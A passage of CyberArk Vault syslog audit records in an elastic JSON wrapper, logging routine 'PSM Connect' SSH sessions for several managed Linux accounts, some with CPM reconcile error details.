Value=\"LINUX-SSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"admin2\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"radiussrv.cyberark.local\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"CPMDisabled\" Value=\"No Reason\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"Customer\" Value=\"Tesla\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n</syslog>","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"300","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}}
-<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:20</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:20Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:46:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:46:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:34</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:34Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:37</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:25</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:37</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:50:43</Timestamp>\n    <IsoTimestamp>2021-03-14T13:50:43Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:56</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:39</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:39Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    